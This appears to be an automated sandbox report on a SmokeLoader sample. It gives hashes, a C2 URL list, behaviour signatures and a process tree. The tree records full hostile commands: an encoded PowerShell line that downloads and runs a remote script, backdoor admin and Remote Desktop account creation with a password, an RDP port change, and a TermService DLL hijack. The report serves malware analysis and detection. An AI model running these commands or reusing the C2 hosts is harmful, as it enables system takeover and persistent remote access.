Analysis

  Max time kernel:  151s
  Max time network: 134s
  Platform:         windows10_x64
  Resource:         win10-en-20210920
  Submitted:        18/10/2021, 12:00
Tasks

  Static task static1

  Behavioral task behavioral1
    Sample:   580fc5cd72d7979040fa1c4866ada3d0.exe
    Resource: win7-en-20211014

  Behavioral task behavioral2
    Sample:   580fc5cd72d7979040fa1c4866ada3d0.exe
    Resource: win10-en-20210920
General

  Target: 580fc5cd72d7979040fa1c4866ada3d0.exe
  Size:   343KB
  MD5:    580fc5cd72d7979040fa1c4866ada3d0
  SHA1:   7da202d99be94f57f355c611bafde9656bca65b7
  SHA256: 42e7ef551c652a5e6f0ff919fcb53cd2c34682006cb1436295205a41abec6589
  SHA512: b1be0be516e0d36c4b2e2f9e82e5cd94fecc86c39a4eee4494174f55e319a4c72d529e2aa097d3d466c5613df4106624fd689e6a1441e6be4a7bf9a15dc44815
Malware Config

  Extracted (URL):
    https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

  Extracted (smokeloader, version 2020), C2 list:
    http://directorycart.com/upload/
    http://tierzahnarzt.at/upload/
    http://streetofcards.com/upload/
    http://ycdfzd.com/upload/
    http://successcoachceo.com/upload/
    http://uhvu.cn/upload/
    http://japanarticle.com/upload/
Signatures

SmokeLoader
  Modular backdoor trojan in use since 2014.

Grants admin privileges (1 TTP)
  Uses net.exe to modify the user's privileges.

Blocklisted process makes network request (9 IoCs)
  flow  pid   Process
  57    1624  powershell.exe
  59    1624  powershell.exe
  60    1624  powershell.exe
  61    1624  powershell.exe
  63    1624  powershell.exe
  65    1624  powershell.exe
  67    1624  powershell.exe
  69    1624  powershell.exe
  71    1624  powershell.exe

Downloads MZ/PE file

Executes dropped EXE (1 IoC)
  pid   Process
  4232  2F69.exe

Modifies RDP port number used by Windows (1 TTP)

Sets DLL path for service in the registry (2 TTPs)

  resource                                      yara_rule
  behavioral2/files/0x000600000001abc7-359.dat  upx
  behavioral2/files/0x000900000001abca-360.dat  upx

Deletes itself (1 IoC)
  pid   Process
  3028  Process not Found

Loads dropped DLL (2 IoCs)
  pid   Process
  3764  Process not Found
  3764  Process not Found

Drops file in Program Files directory (4 IoCs)
  Process: powershell.exe (all entries)
  description                   ioc
  File opened for modification  C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI
  File opened for modification  C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT
  File opened for modification  C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI
  File opened for modification  C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT

Drops file in Windows directory (19 IoCs)
  Process: powershell.exe (all entries)
  description                   ioc
  File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  File created                  C:\Windows\branding\mediasvc.png
  File created                  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI7F22.tmp
  File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  File created                  C:\Windows\branding\mediasrv.png
  File opened for modification  C:\Windows\branding\mediasvc.png
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI7F32.tmp
  File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_ek2eyhek.sp3.psm1
  File opened for modification  C:\Windows\branding\Basebrd
  File opened for modification  C:\Windows\branding\ShellBrd
  File opened for modification  C:\Windows\branding\mediasrv.png
  File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_i2mytaak.zra.ps1
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI7F11.tmp
  File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat
  File created                  C:\Windows\branding\wupsvc.jpg
  File opened for modification  C:\Windows\branding\wupsvc.jpg
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI7EC1.tmp
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI7EF1.tmp

Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
  SCSI information is often read in order to detect sandboxing environments.
  Process: 580fc5cd72d7979040fa1c4866ada3d0.exe (all entries)
  description     ioc
  Key queried     \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI
  Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI
  Key opened      \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI

Modifies data under HKEY_USERS (64 IoCs)
  Process: powershell.exe (all entries)
  description       ioc
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]"
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313"
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1"
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]"
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3"
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1"
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3"
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs
  Key created       \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018"
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33"
  Key created       \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728"
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1"
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]"
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]"
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet"
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0"
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424"
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1"
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag,"
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates
  Key created       \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422"
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0"
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates
  Set value (data)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000
  Set value (data)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426"
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet"
  Key created       \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3"
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1400 = "1"
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]"
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0"
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912"
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219"
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425"
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3"
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3"
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"

Modifies registry key (1 TTP, 1 IoC)
  pid   Process
  1100  reg.exe

Runs net.exe

Script User-Agent (4 IoCs)
  Uses user-agent string associated with script host/environment.
  description             flow  ioc
  HTTP User-Agent header  59    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header  60    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header  61    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header  63    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses (64 IoCs)
  pid   Process
  4088  580fc5cd72d7979040fa1c4866ada3d0.exe
  4088  580fc5cd72d7979040fa1c4866ada3d0.exe
  3028  Process not Found  (62 identical entries)

Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  pid   Process
  3028  Process not Found

Suspicious behavior: LoadsDriver (2 IoCs)
  pid   Process
  628   Process not Found
  628   Process not Found

Suspicious behavior: MapViewOfSection (1 IoC)
  pid   Process
  4088  580fc5cd72d7979040fa1c4866ada3d0.exe

Suspicious use of AdjustPrivilegeToken (64 IoCs)
  pid   Process         Token(s)
  4432  powershell.exe  SeDebugPrivilege
  1784  powershell.exe  SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  4860  powershell.exe  SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  4920  powershell.exe  SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33

Suspicious use of FindShellTrayWindow (2 IoCs)
  pid   Process
  3028  Process not Found
  3028  Process not Found

Suspicious use of SendNotifyMessage (5 IoCs)
  pid   Process
  3028  Process not Found  (5 identical entries)

Suspicious use of WriteProcessMemory (64 IoCs)
  Each row below is recorded twice in the report (32 distinct rows, 64 entries).
  description                         pid   Process            procid_target
  PID 3028 wrote to memory of 4232    3028  Process not Found  70
  PID 4232 wrote to memory of 4432    4232  2F69.exe           73
  PID 4432 wrote to memory of 1168    4432  powershell.exe     75
  PID 1168 wrote to memory of 1256    1168  csc.exe            76
  PID 4432 wrote to memory of 1784    4432  powershell.exe     77
  PID 4432 wrote to memory of 4860    4432  powershell.exe     80
  PID 4432 wrote to memory of 4920    4432  powershell.exe     82
  PID 4432 wrote to memory of 1048    4432  powershell.exe     84
  PID 4432 wrote to memory of 1100    4432  powershell.exe     85
  PID 4432 wrote to memory of 3464    4432  powershell.exe     86
  PID 4432 wrote to memory of 2108    4432  powershell.exe     87
  PID 2108 wrote to memory of 2224    2108  net.exe            88
  PID 4432 wrote to memory of 1700    4432  powershell.exe     89
  PID 1700 wrote to memory of 2948    1700  cmd.exe            90
  PID 2948 wrote to memory of 4492    2948  cmd.exe            91
  PID 4492 wrote to memory of 3160    4492  net.exe            92
  PID 4432 wrote to memory of 3608    4432  powershell.exe     93
  PID 3608 wrote to memory of 3192    3608  cmd.exe            94
  PID 3192 wrote to memory of 2404    3192  cmd.exe            95
  PID 2404 wrote to memory of 3052    2404  net.exe            96
  PID 5008 wrote to memory of 5056    5008  cmd.exe            100
  PID 5056 wrote to memory of 3828    5056  net.exe            101
  PID 3116 wrote to memory of 3564    3116  cmd.exe            104
  PID 3564 wrote to memory of 3664    3564  net.exe            105
  PID 3020 wrote to memory of 4080    3020  cmd.exe            108
  PID 4080 wrote to memory of 3936    4080  net.exe            109
  PID 4404 wrote to memory of 4164    4404  cmd.exe            112
  PID 4164 wrote to memory of 856     4164  net.exe            113
  PID 356 wrote to memory of 1232     356   cmd.exe            116
  PID 1232 wrote to memory of 1392    1232  net.exe            117
  PID 1212 wrote to memory of 1584    1212  cmd.exe            120
  PID 1584 wrote to memory of 1668    1584  net.exe            121
Processes

Process tree (indentation shows parent/child depth; "Image" is the executable path, "Command" the recorded command line).

Image:   C:\Users\Admin\AppData\Local\Temp\580fc5cd72d7979040fa1c4866ada3d0.exe  (PID 4088)
Command: "C:\Users\Admin\AppData\Local\Temp\580fc5cd72d7979040fa1c4866ada3d0.exe"
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection

Image:   C:\Users\Admin\AppData\Local\Temp\2F69.exe  (PID 4232)
Command: C:\Users\Admin\AppData\Local\Temp\2F69.exe
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory

    Image:   C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 4432)
    Command: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      - Drops file in Windows directory
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

        Image:   C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  (PID 1168)
        Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hh25b14x\hh25b14x.cmdline"
          - Suspicious use of WriteProcessMemory

            Image:   C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe  (PID 1256)
            Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES461D.tmp" "c:\Users\Admin\AppData\Local\Temp\hh25b14x\CSCDD0732B8F6904A22B1D567148B4DB08E.TMP"

        Image:   C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 1784)
        Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Suspicious use of AdjustPrivilegeToken

        Image:   C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 4860)
        Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Suspicious use of AdjustPrivilegeToken

        Image:   C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 4920)
        Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Suspicious use of AdjustPrivilegeToken

        Image:   C:\Windows\system32\reg.exe  (PID 1048)
        Command: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

        Image:   C:\Windows\system32\reg.exe  (PID 1100)
        Command: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
          - Modifies registry key

        Image:   C:\Windows\system32\reg.exe  (PID 3464)
        Command: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

        Image:   C:\Windows\system32\net.exe  (PID 2108)
        Command: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
          - Suspicious use of WriteProcessMemory

            Image:   C:\Windows\system32\net1.exe  (PID 2224)
            Command: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

        Image:   C:\Windows\system32\cmd.exe  (PID 1700)
        Command: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
          - Suspicious use of WriteProcessMemory

            Image:   C:\Windows\system32\cmd.exe  (PID 2948)
            Command: cmd /c net start rdpdr
              - Suspicious use of WriteProcessMemory

                Image:   C:\Windows\system32\net.exe  (PID 4492)
                Command: net start rdpdr
                  - Suspicious use of WriteProcessMemory

                    Image:   C:\Windows\system32\net1.exe  (PID 3160)
                    Command: C:\Windows\system32\net1 start rdpdr

        Image:   C:\Windows\system32\cmd.exe  (PID 3608)
        Command: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
          - Suspicious use of WriteProcessMemory

            Image:   C:\Windows\system32\cmd.exe  (PID 3192)
            Command: cmd /c net start TermService
              - Suspicious use of WriteProcessMemory

                Image:   C:\Windows\system32\net.exe  (PID 2404)
                Command: net start TermService
                  - Suspicious use of WriteProcessMemory

                    Image:   C:\Windows\system32\net1.exe  (PID 3052)
                    Command: C:\Windows\system32\net1 start TermService

        Image:   C:\Windows\system32\cmd.exe  (PID 2728)
        Command: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

        Image:   C:\Windows\system32\cmd.exe  (PID 2908)
        Command: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

Image:   C:\Windows\System32\cmd.exe  (PID 5008)
Command: cmd /C net.exe user WgaUtilAcc 000000 /del
  - Suspicious use of WriteProcessMemory

    Image:   C:\Windows\system32\net.exe  (PID 5056)
    Command: net.exe user WgaUtilAcc 000000 /del
      - Suspicious use of WriteProcessMemory

        Image:   C:\Windows\system32\net1.exe  (PID 3828)
        Command: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del

Image:   C:\Windows\System32\cmd.exe  (PID 3116)
Command: cmd /C net.exe user WgaUtilAcc agVLh50q /add
  - Suspicious use of WriteProcessMemory

    Image:   C:\Windows\system32\net.exe  (PID 3564)
    Command: net.exe user WgaUtilAcc agVLh50q /add
      - Suspicious use of WriteProcessMemory

        Image:   C:\Windows\system32\net1.exe  (PID 3664)
        Command: C:\Windows\system32\net1 user WgaUtilAcc agVLh50q /add

Image:   C:\Windows\System32\cmd.exe  (PID 3020)
Command: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  - Suspicious use of WriteProcessMemory

    Image:   C:\Windows\system32\net.exe  (PID 4080)
    Command: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
      - Suspicious use of WriteProcessMemory

        Image:   C:\Windows\system32\net1.exe  (PID 3936)
        Command: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

Image:   C:\Windows\System32\cmd.exe  (PID 4404)
Command: cmd /C net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
  - Suspicious use of WriteProcessMemory

    Image:   C:\Windows\system32\net.exe  (PID 4164)
    Command: net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
      - Suspicious use of WriteProcessMemory

        Image:   C:\Windows\system32\net1.exe  (PID 856)
        Command: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD

Image:   C:\Windows\System32\cmd.exe  (PID 356)
Command: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  - Suspicious use of WriteProcessMemory

    Image:   C:\Windows\system32\net.exe  (PID 1232)
    Command: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
      - Suspicious use of WriteProcessMemory

        Image:   C:\Windows\system32\net1.exe  (PID 1392)
        Command: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

Image:   C:\Windows\System32\cmd.exe  (PID 1212)
Command: cmd /C net.exe user WgaUtilAcc agVLh50q
  - Suspicious use of WriteProcessMemory

    Image:   C:\Windows\system32\net.exe  (PID 1584)
    Command: net.exe user WgaUtilAcc agVLh50q
      - Suspicious use of WriteProcessMemory

        Image:   C:\Windows\system32\net1.exe  (PID 1668)
        Command: C:\Windows\system32\net1 user WgaUtilAcc agVLh50q

Image:   C:\Windows\System32\cmd.exe  (PID 2164)
Command: cmd.exe /C wmic path win32_VideoController get name

    Image:   C:\Windows\System32\Wbem\WMIC.exe  (PID 4132)
    Command: wmic path win32_VideoController get name

Image:   C:\Windows\System32\cmd.exe  (PID 3832)
Command: cmd.exe /C wmic CPU get NAME

    Image:   C:\Windows\System32\Wbem\WMIC.exe  (PID 824)
    Command: wmic CPU get NAME

Image:   C:\Windows\System32\cmd.exe  (PID 1772)
Command: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

    Image:   C:\Windows\system32\cmd.exe  (PID 4812)
    Command: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

        Image:   C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 1624)
        Command: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
          - Blocklisted process makes network request
          - Drops file in Program Files directory
          - Drops file in Windows directory
          - Modifies data under HKEY_USERS